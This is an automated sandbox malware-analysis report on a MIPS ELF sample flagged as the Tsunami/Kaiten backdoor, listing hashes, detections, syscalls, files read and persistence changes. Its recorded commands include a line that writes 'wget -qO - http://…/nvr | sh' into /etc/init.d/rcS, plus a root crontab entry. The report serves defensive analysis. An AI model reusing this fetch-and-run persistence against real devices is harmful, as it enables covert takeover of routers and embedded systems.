Sample : 9e058c9af47a62167947c9d0e8762c2bacb3ff66a189f1ecb2f09d09a634277c

Summary


OS ABI

UNIX - System V
CPU class

32 bit
Persistence (user)

Yes
Persistence (root)

Yes
CPU byte order

2's complement MSB
File type

ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), too many section (65535)
CPU type

MIPS I
Entropy

7.23056638266
Syscalls executed (root)

72284
Syscalls executed (user)

66351
ELF type

Executable file

ELF


Class

32 bit
Data encoding

2's complement MSB
Operating system ABI

UNIX - System V
Object file type

Executable file
ELF version

0.1
Machine

MIPS I
Link

static
Entrypoint

0x108538
Number of segments

2
Number of sections

0
Program header table offset

52
Section header table offset

4294901760
Program header table - size of entry

32
Section header table - size of entry

40
Program header table - entries

2
Section header table - entries

65535
Section header table - index sections names

65535
Stripped

True
Sections stripped

True
Anomalies


Segments
High entropy : PT_LOAD at offset 0x0 - 7.933485
Memory size doubles physical size : PT_LOAD at offset 0xd8e4


Sections
Wrong number of section headers : i
n
v
a
l
i
d
Section header table offset beyond file : True


Debug information

False
Pyelftools errors

expected 4, found 0
GDB errors

"/tmp/tmp.h6PkWQV5Ps/9e058c9af47a62167947c9d0e8762c2bacb3ff66a189f1ecb2f09d09a634277c": not in executable format: File truncated
Readelf errors

readelf: Error: Reading 0x27ffd8 bytes extends past end of file for section headers readelf: Error: Section headers are not available!

Hash


MD5

93935856bc4a97090ff1b5b0d2c69e34
SHA1

4e80a06bbe57b494dce200c9829bdb37afc877e3
SHA256

9e058c9af47a62167947c9d0e8762c2bacb3ff66a189f1ecb2f09d09a634277c
SHA512

18e79b7dfd279bcd8a937d966bda89ce28a82b192c1ad384be21c00fa6e3e159c68a87b8eeefbd4c11bee36528da57fc01e8d86a07f7b135366065b13e783357
ssdeep

1536:Tsz09Z0P64IGy21DAcGtaAXn0Hs1VcuEEe:eS+6thlXFV7E

Bytes


Entropy

7.23056638266
Min entropy (16KB blocks)

7.01662624786
Max entropy (16KB blocks)

7.98885616
Unique bytes (0-255)

256
Null bytes

9931
White spaces

1144
Printable bytes

16743
First 16B

7f 45 4c 46 01 02 01 00 00 00 00 00 00 00 00 00
Last 16B

00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Longest same bytes sequence

Byte : 0x0

Offset : 0x66

Length : 10

Three rarest bytes

0x38 - 140 times

0xe9 - 137 times

0x9e - 135 times

Three most common bytes

0x0 - 9931 times

0x10 - 330 times

0x2 - 303 times

File type


Mime type

application/x-executable
File type

ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), too many section (65535)

VirusTotal


URL

https://www.virustotal.com/#/file/9e058c9af47a62167947c9d0e8762c2bacb3ff66a189f1ecb2f09d09a634277c
Positive

17
Total AVs

55
Scan date

2017-05-18 00:31:53
AVClass

tsunami
Detection

Ikarus : Linux.Tsunami

Avira : LINUX/Tsunami.qkevn

DrWeb : Linux.BackDoor.Tsunami.368

ClamAV : Unix.Malware.Agent-1733993

Symantec : Linux.Kaiten

AegisLab : Backdoor.Linux.Tsunami!c

ZoneAlarm : HEUR:Backdoor.Linux.Tsunami.br

Kaspersky : HEUR:Backdoor.Linux.Tsunami.br

Avast : ELF:Tsunami-DO [Trj]

Fortinet : Malware_Generic.P0

NANO-Antivirus : Trojan.Tsunami.egvkja

Jiangmin : Backdoor.Linux.gdi

ESET-NOD32 : a variant of Linux/Tsunami.NCD

AVG : Linux/Tsunami.CY

Sophos : Linux/Tsunami-G

GData : Linux.Trojan.Agent.MXL9N9

Qihoo-360 : Win32/Backdoor.059

Code Explore


Nucleus

Eh_frame

Sandbox (user)


Standard output

Standard error

Sandbox (root)


Standard output

Standard error

Behavior


User behavior

Syscalls


Unique
lseek
rt_sigaction
mprotect
uname
brk
llseek
close
open
write
exit_group
getpriority
geteuid
lstat
umask
access
setsid
setpriority
exit
getpid
dup
getrlimit
munmap
fstat
listen
fork
stat
dup2
read
clone
getppid
ioctl
readlink
execve
wait4
getuid
socket
fstatat
bind
fcntl
mmap2
unlinkat


Unique number
41

Total number
66351

Instrumented libc calls


Unique
strchr
strcmp
memchr
memcmp


Unique number
4

Total number
1340

If uid is checked

True

Permission related errors

True

Type of permission related error


EACCES
True

Number of processes

18

Trace lines lost

0

Persistence


Create
/etc/init.d/rcS
/etc/init.d/rcS.bak


Dropped files


Create
/dev/null


Modify
/dev/null


Files being read

/opt/glibc/share/locale/locale.alias

/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION

/etc/issue

/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION

/opt/glibc/lib/tls/libc.so.6

/opt/glibc/lib/libc.so.6

/etc/ISP_name

/sbin/sncfg

/bin/nvram

/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION

/opt/glibc/lib/locale/en/LC_IDENTIFICATION

/etc/init.d/rcS

/tmp/toexec

/usr/bin/r2

/tmp/9e058c9af47a62167947c9d0e8762c2bacb3ff66a189f1ecb2f09d09a634277c

/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION

/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION

/proc/604/cmdline

/dev/null

/bin/cfgmtd

/etc/Model_name

/usr/sbin/nvram

/proc/version

/opt/glibc/lib/locale/locale-archive

Max sleep

-1.0

System cmds

sh -c rm -rf /var/run/tty3 > /dev/null 2>&1 &

sh -c rm -rf /var/run/wgsh > /dev/null 2>&1 &

grep -v \"wget\" > /etc/init.d/rcS.bak

sh &\" > /etc/init.d/rcS

sh -c rm -rf /var/run/tty0 > /dev/null 2>&1 &

sh -c rm -rf /etc/init.d/rcS.bak

sh -c echo \"sleep 300

sh -c cat /etc/init.d/rcS

sh -c cat /etc/init.d/rcS.bak >> /etc/init.d/rcS

sh -c rm -rf /var/run/bbsh > /dev/null 2>&1 &

sh -c rm -rf /var/run/tty4 > /dev/null 2>&1 &

cat /etc/init.d/rcS

rm -rf /var/run/wgsh

sh -c rm -rf /var/run/tty5 > /dev/null 2>&1 &

rm -rf /var/run/tty2

wget -qO - http://y.fd6fq54s6df541q23sdxfg.eu/nvr

sh -c rm -rf /var/run/tty2 > /dev/null 2>&1 &

rm -rf /etc/init.d/rcS.bak

Ioctls


Total
9

Fail
TIOCNXCL


String or memory comparison

"/opt/glibc/lib/locale/en_US.UTF-8.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_...

"coreutils", "messages"

"/opt/glibc/lib/locale/en_US.UTF-8.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en/LC_IDENTIFICAT...

"rm", "until"

"cat", "cat"

"echo", "elif"

"", 0x77481d84

"cat", "bg"

"echo", "exec"

"cat", "do"

"echo", "jobs"

"/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION"

"sleep 300 && wget \201-qO \201- http\201:\201/\201/y.fd6fq54s6df541q23sdxfg.eu\201/nvr | sh &\210",...

"cat", "break"

"/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATI...

"echo", "eval"

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION"

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION...

"grep", "if"

"rm", "set"

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFI...

"echo", "done"

"/opt/glibc/lib/locale/en/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION"

"/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICAT...

"echo", "for"

"", 0x77742d84

"grep", "grep"

"wget\210", "\202\001@=\210", 5

"/usr/share/locale", "/opt/glibc/share/locale"

"cat", "jobs"

"echo", "echo"

"cat", "for"

"cat", "case"

"grep", "jobs"

"rm", "for"

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION"

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en_US/LC_IDENTIFICATIO...

"/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENTIFI...

"grep", "in"

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en/LC_IDENTIFICATION"

"cat", "chdir"

"grep", "export"

"grep", "continue"

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENT...

"/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENTI...

"echo", "do"

"/opt/glibc/lib/locale/en_US.UTF-8.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENT...

"en_US.UTF-8", "POSIX"

"cat", "continue"

"UTF-8", "utf8"

"cat", "cd"

"/opt/glibc/lib/locale/en_US.UTF-8.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en_US.UTF-8/LC_ID...

"/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENTIFIC...

"rm", "return"

"rm", "then"

"grep", "getopts"

"rm", "test"

"/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATIO...

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en/LC_IDENTIFICATION"

"grep", "until"

"/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en/LC_IDENTIFICATION"

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICA...

"/opt/glibc/lib/locale/en/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en/LC_IDENTIFICATION"

"echo", "continue"

"rm", "jobs"

"grep", "for"

"echo", "export"

"/opt/glibc/lib/locale/en/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENTIFICATION...

"grep", "hash"

"/opt/glibc/lib/locale/en_US.UTF-8.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTI...

"", 0x77dcfd84

"rm", "in"

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENTIFICAT...

"/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION...

"/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION...

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICAT...

"en_US.UTF-8", "C"

"rm", "read"

"/opt/glibc/lib/locale/en/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION"

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION"

"cat", "elif"



Root behavior

Syscalls


Unique
rename
lseek
getdents
rt_sigaction
mprotect
uname
brk
connect
llseek
close
getgid
open
select
write
getsockopt
exit_group
getpriority
geteuid
lstat
umask
send
access
setsid
setpriority
exit
getpid
openat
dup
getrlimit
munmap
fstat
listen
fork
stat
dup2
read
commit_creds
clone
setresgid
getppid
statfs64
set_robust_list
ioctl
chdir
readlink
nanosleep
recv
execve
utime
wait4
setsockopt
set_tid_address
getuid
socket
fsync
fstatat
bind
fcntl
gettimeofday
futex
mmap2
setresuid
time
unlinkat
getegid
fchmod
rt_sigprocmask


Unique number
67

Total number
72284

Instrumented libc calls


Unique
strchr
strcmp
memchr
memcmp


Unique number
4

Total number
8543

Number of processes

112

Trace lines lost

0

Persistence


Create
/etc/init.d/rcS
/etc/init.d/rcS.bak


Modify
crontabs/tmp.5Rwrne


Dropped files


Create
/dev/null
/var/run/.x001804289383


Modify
/dev/null


Files being read

/opt/glibc/share/locale/locale.alias

/proc/45/stat

/proc/19/stat

/lib/modules/4.3.6/modules.dep.bin

/proc/244/stat

/etc/rc.conf

/opt/glibc/lib/libc.so.6

/proc/13/stat

/proc/77/stat

/etc/init.d/rcS.bak

/lib/libip4tc.so.0

/proc/730/cmdline

/proc/8/stat

/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION

/var/run/thttpd.pid

/proc/42/stat

/lib/mips-linux-gnu/libpthread.so.0

/proc/269/stat

/proc/40/stat

/proc/22/stat

/proc/303/stat

/proc/728/cmdline

/proc/730/stat

/lib/modprobe.d/aliases.conf

/usr/lib/locale/locale-archive

/proc/43/stat

/etc/nsswitch.conf

/opt/glibc/lib/libpcre.so.3

/lib/mips-linux-gnu/libpam.so.0

/lib/mips-linux-gnu/libselinux.so.1

/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION

/proc/833/stat

/etc/issue

/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION

/opt/glibc/lib/libip4tc.so.0

/proc/6/stat

/proc/10/stat

/proc/12/stat

/proc/39/stat

/proc/11/stat

/lib/mips-linux-gnu/libpcre.so.3

/proc/cmdline

/proc/142/stat

/proc/7/stat

/var/run/.x001804289383

/etc/modprobe.d

/proc/1/stat

/opt/glibc/lib/tls/libip4tc.so.0

/etc/init.d/rcS

/lib/mips-linux-gnu/libaudit.so.1

/proc/44/stat

/etc/protocols

/proc/24/stat

/usr/sbin/service

/proc/20/stat

/proc/146/stat

/tmp/toexec

/proc/98/stat

/opt/glibc/lib/libip6tc.so.0

/usr/bin/r2

/proc/564/stat

/bin/uname

/proc/35/stat

/proc/257/stat

/opt/glibc/lib/libnss_files.so.2

/opt/glibc/lib/tls/libpcre.so.3

/lib/mips-linux-gnu/libnss_compat.so.2

/lib/modprobe.d

/lib/modules/4.3.6/modules.alias.bin

/lib/mips-linux-gnu/libnss_nis.so.2

/etc/Model_name

/usr/sbin/nvram

/lib/mips-linux-gnu/libnsl.so.1

/opt/glibc/lib/libm.so.6

/proc/18/stat

/opt/glibc/lib/libxtables.so.10

/etc/rc.d/rc.local

/proc

/tmp/.xs

/proc/filesystems

/lib/xtables/libxt_tcp.so

/etc/passwd

/etc/modprobe.d/fbdev-blacklist.conf

/proc/38/stat

/etc/localtime

/proc/4/stat

/sbin/sncfg

/bin/nvram

/opt/glibc/lib/libdl.so.2

/proc/97/stat

/opt/glibc/lib/libpthread.so.0

/proc/46/stat

/lib/mips-linux-gnu/libdl.so.2

/lib/mips-linux-gnu/libnss_files.so.2

/proc/47/stat

/opt/glibc/lib/libnss_db.so.2

/tmp/9e058c9af47a62167947c9d0e8762c2bacb3ff66a189f1ecb2f09d09a634277c

/proc/718/stat

/lib/xtables/libxt_standard.so

/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION

/proc/sys/kernel/modprobe

/proc/5/stat

crontabs/root

/proc/9/stat

/proc/14/stat

/proc/version

/lib/mips-linux-gnu/libc.so.6

/usr/bin/crontab

/opt/glibc/lib/locale/locale-archive

/proc/37/stat

/proc/16/stat

/proc/98/cmdline

/lib/modules/4.3.6/modules.softdep

/proc/687/stat

/opt/glibc/lib/tls/libc.so.6

/proc/2/stat

/proc/36/stat

/proc/289/stat

/etc/ISP_name

/bin/crontab

/proc/273/stat

/opt/glibc/lib/locale/en/LC_IDENTIFICATION

/proc/15/stat

/proc/21/stat

/etc/ld.so.cache

/var/db/protocols.db

/proc/17/stat

/lib/libip6tc.so.0

/proc/3/stat

/proc/79/stat

/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION

/proc/720/stat

/proc/146/cmdline

/proc/128/stat

/proc/23/stat

/proc/271/stat

/dev/null

/proc/131/stat

/proc/275/stat

/proc/308/stat

/bin/cfgmtd

/lib/libxtables.so.10

/proc/41/stat

Max sleep

1.0

Ioctls


Total
22

Success
0x667e


Fail
TIOCNXCL


Unlink files

/var/run/.x001804289383

/etc/init.d/rcS.bak

String or memory comparison

"tcp", "ICMP"

"rm", "in"

"killall", "until"

"/usr/share/locale", "/opt/glibc/share/locale"

"", 0x770ded84

"cat", "jobs"

"", 0x77ae2d84

"", 0x77709d84

"grep", "continue"

"basename", "bg"

"", 0x7783ad84

"rm", "return"

"grep", "getopts"

"}", "{"

"tcp", "ipencap"

"softdep", "install"

"chmod", "for"

"", 0x77049d84

"/bin/uname", "case"

"nvram", "until"

"{", "until"

"dropbear", "ksoftirqd/0"

"", 0x77f80d84

"options", "options"

"dropbear", "kworker/0:3"

"cat", "break"

"softdep", "alias"

"kill", "then"

"nvram", "read"

"grep", "jobs"

"service", "set"

"return", "in"

"killall", "for"

"iptables", "hash"

"dropbear", "dbus-daemon"

"dropbear", "kintegrityd"

"tcp", "IP"

"dropbear", "scsi_eh_0"

"dropbear", "nfsiod"

"/opt/glibc/lib/locale/en/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENTIFICATION...

"tcp", "ipv6-icmp"

"tcp", "ST"

"", 0x77e7ed84

"dropbear", "stapio"

"softdep", "remove"

"cat", "bg"

"dropbear", "khungtaskd"

"dropbear", "fsnotify_mark"

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION...

"grep", "until"

"kill", "read"

"", 0x776a8d84

"crontab", "for"

"kill", "test"

"is_ignored_file", "in"

"/bin/uname", "do"

"/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION...

"dropbear", "kworker/u2:3"

"insmod", "modprobe"

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICAT...

"service", "read"

"Usage\201: \204 < option > | \201-\201-status\201-all | \201[ service_name \201[ command | \201-\20...

"killall", "jobs"

"/opt/glibc/lib/locale/en_US.UTF-8.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTI...

"dropbear", "deferwq"

"", 0x779e1d84

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENTIFICAT...

"protocols", "group"

"return", "then"

"iptables", "jobs"

"chmod", "bg"

"is_ignored_file", "export"

"}", "until"

"crontab", "export"

"tcp", "ip"

"softdep", "softdep"

"service", "test"

"tcp", "IGMP"

"wget", "wget"

"", 0x77d4ad84

"dropbear", "crypto"

"grep", "grep"

"basename", "elif"

"dropbear", "agetty"

"lsmod", "modprobe"

"crontab", "exec"

"", 0x7778dd84

"rm", "read"

"}", "for"

"iptables", "for"

"touch", "then"

"echo", "elif"

"killall", "kill"

"chmod", "do"

"/bin/uname", "elif"

"lesshts/run", ""

"kill", "kill"

"protocols", "hosts"

"echo", "echo"

"touch", "in"

"basename", "for"

"in", "until"

"esac", "esac"

"dropbear", "systemd-journal"

"options", "blacklist"

"kill", "until"

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION"

"modprobe", "kmod"

"/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en/LC_IDENTIFICATION"

"is_ignored_file", "then"

"iptables", "getopts"

"tcp", "icmp6"

"grep", "hash"

"case", "elif"

"service", "until"

"", 0x77bbad84

"tcp", "icmp"

"dropbear", "kworker/u2:0"

"chmod", "elif"

"cat", "do"

"tcp", "hopopt"

"dropbear", "systemd-udevd"

"", 0x77b84d84

"rm", "for"

".conf", ".conf"

"grep", "in"

"/opt/glibc/lib/locale/en_US.UTF-8.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENT...

"", 0x77884d84

"}", "}"

"dropbear", "kworker/0:2"

"echo", "done"

"db", "files"

"return", "for"

"/bin/uname", "for"

"touch", "for"

"cat", "elif"

"/opt/glibc/lib/locale/en_US.UTF-8.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_...

"iptables", "then"

"", 0x77a3ed84

"dropbear", "rpc.statd"

"tcp", "IP-ENCAP"

"DROP", "DROP"

"basename", "case"

"dropbear", "scsi_eh_1"

"service", "return"

0x779adca0, "libxtables.so.10"

"dropbear", "ata_sff"

"/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICAT...

"DROP", "ACCEPT"

"cat", "for"

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en_US/LC_IDENTIFICATIO...

"", 0x7782cd84

"", 0x778b4d84

"rm", "test"

"softdep", "blacklist"

"tcp", "GGP"

"\204 ver. 0.91\201-ubuntu1\210", "\202\001@=\210", 5

"cat", "continue"

"skeleton", "until"

"rmmod", "modprobe"

"echo", "export"

"dropbear", "ext4-rsv-conver"

"standard", "DROP"

"modprobe", "modprobe"

"coreutils", "messages"

"dropbear", "kworker/u2:4"

"echo", "eval"

"case", "for"

"standard", "ACCEPT"

"", 0x776e3d84

"is_ignored_file", "until"

"iptables", "continue"

"dropbear", "kauditd"

"dropbear", "scsi_tmf_0"

"crontab", "echo"

"standard", "standard"

"\201* \201* \201* \201* \201* \201/tmp\201/9e058c9af47a62167947c9d0e8762c2bacb3ff66a189f1ecb2f09d09...

"dropbear", "kblockd"

"protocols", "netgroup"

"dropbear", "devfreq_wq"

"psmisc", "messages"

"in", "in"

"\201/tmp\201/9e058c9af47a62167947c9d0e8762c2bacb3ff66a189f1ecb2f09d09a634277c\210", "\202\001@=\210...

"dropbear", "sshd"

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFI...

"", 0x77d14d84

"wget\210", "\202\001@=\210", 5

"nvram", "printf"

"{", "for"

"protocols", "passwd"

"", 0x77b8ed84

"/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENTIFIC...

"dropbear", "bioset"

"chmod", "chdir"

"standard", "QUEUE"

"standard", "RETURN"

"dropbear", "kswapd0"

"echo", "continue"

"basename", "alias"

"en_US.UTF-8", "C"

"", 0x773f7d84

"crontab", "crontab"

"is_ignored_file", "hash"

"dropbear", "netns"

"sleep 300 && wget \201-qO \201- http\201:\201/\201/y.fd6fq54s6df541q23sdxfg.eu\201/nvr | sh &\210",...

"rm", "set"

"chmod", "case"

"service", "jobs"

"", 0x772bdd84

"dropbear", "perf"

"nvram", "jobs"

"grep", "if"

"is_ignored_file", "getopts"

"softdep", "options"

"rm", "jobs"

"en_US.UTF-8", "POSIX"

"is_ignored_file", "continue"

"dropbear", "kworker/u2:1"

"", 0x77786d84

"nvram", "for"

"tcp", "HOPOPT"

"", 0x77c92d84

"no cron\210", "\202\001@=\210", 5

"protocols", "gshadow"

"case", "do"

"dropbear", "rpcbind"

"crontab", "do"

"is_ignored_file", "jobs"

"dropbear", "kworker/0:1"

"protocols", "rpc"

"libc", "coreutils"

"esac", "for"

"dropbear", "ksmd"

"basename", "jobs"

"return", "until"

"/opt/glibc/lib/locale/en/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en/LC_IDENTIFICATION"

"cat", "chdir"

"", 0x770a0d84

"dropbear", "rpc.idmapd"

"", 0x77d79d84

"echo", "exec"

"basename", "["

"/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENTI...

"dropbear", "systemd"

"", 0x772a0d84

"dropbear", "watchdog/0"

"kill", "in"

"libxtables.so.10", "libxtables.so.10"

"killall", "in"

"blacklist", "blacklist"

"chmod", "continue"

"echo", "do"

"dropbear", "kworker/0:1H"

"dropbear", "systemd-logind"

"/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION"

"", 0x7722dd84

"options", "alias"

"blacklist", "alias"

"lesshts\201/run.sh\210", "\202\001@=\210", 5

"killall", "local"

"cat", "case"

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION"

"case", "case"

"is_ignored_file", "for"

"crontab", "eval"

"crontab", "jobs"

"cat", "cd"

"/opt/glibc/lib/locale/en_US.UTF-8.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en_US.UTF-8/LC_ID...

"rm", "then"

"dropbear", "kworker/0:0H"

"killall", "test"

"dropbear", "rpciod"

"chmod", "command"

"kill", "for"

"grep", "messages"

"", 0x77505d84

"", 0x77472d84

"rm", "until"

"crontab", "elif"

"{", "{"

"dropbear", "scsi_tmf_1"

"protocols", "networks"

"nvram", "in"

"basename", "!"

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICA...

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENT...

"", 0x7799bd84

"UTF-8", "utf8"

"", 0x77183d84

"modinfo", "modprobe"

"crontab", "case"

"", 0x7750cd84

"grep", "export"

"service", "then"

"basename", "do"

"/opt/glibc/lib/locale/en_US.UTF-8.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en/LC_IDENTIFICAT...

"cat", "cat"

"/opt/glibc/lib/locale/en_US.utf8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATI...

"protocols", "shadow"

"basename", "continue"

"dropbear", "rsyslogd"

"tcp", "tcp"

"/opt/glibc/lib/locale/en/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION"

"iptables", "iptables"

"pre: ehci-hcd", "pre:", 4

"/opt/glibc/lib/locale/en/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION"

"/bin/uname", "!"

"esac", "elif"

"kill", "jobs"

"service", "in"

"/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.utf8/LC_IDENTIFICATION...

"dropbear", "kdevtmpfs"

"dropbear", "9e058c9af47a621"

"dropbear", "kworker/u2:2"

"dropbear", "writeback"

"fbdev-blacklist.conf", "modules.softdep"

"skeleton", "in"

"tcp", "igmp"

"protocols", "ethers"

"killall", "printf"

"dropbear", "exim4"

"nvram", "then"

"in", "for"

"dropbear", "kworker/0:0"

"aliases.conf", "fbdev-blacklist.conf"

"protocols", "protocols"

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en/LC_IDENTIFICATION"

"skeleton", "for"

"grep", "for"

"/opt/glibc/lib/locale/en/LC_IDENTIFICATION", 0x8

"kill", "printf"

"tcp", "st"

"iptables", "in"

"", 0x77ddfd84

"nvram", "test"

"dropbear", "ipv6_addrconf"

"iptables", "export"

"tcp", "icmpv6"

"echo", "jobs"

"dropbear", "kthrotld"

"chmod", "jobs"

"tcp", "ggp"

"psmisc", "psmisc"

"dropbear", "atd"

"dropbear", "kthreadd"

"iptables", "until"

"protocols", "services"

"dropbear", "jbd2/sda1-8"

"/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8.utf8/LC_IDENTIFI...

"kill", "local"

"/opt/glibc/lib/locale/en_US.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en/LC_IDENTIFICATION"

"killall", "read"

"nvram", "local"

"service", "for"

"skeleton", "then"

"killall", "then"

"crontab", "continue"

"echo", "for"

"", 0x77e9bd84

"/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATIO...

"touch", "until"

"/opt/glibc/lib/locale/en_US/LC_IDENTIFICATION", "/opt/glibc/lib/locale/en.UTF-8/LC_IDENTIFICATION"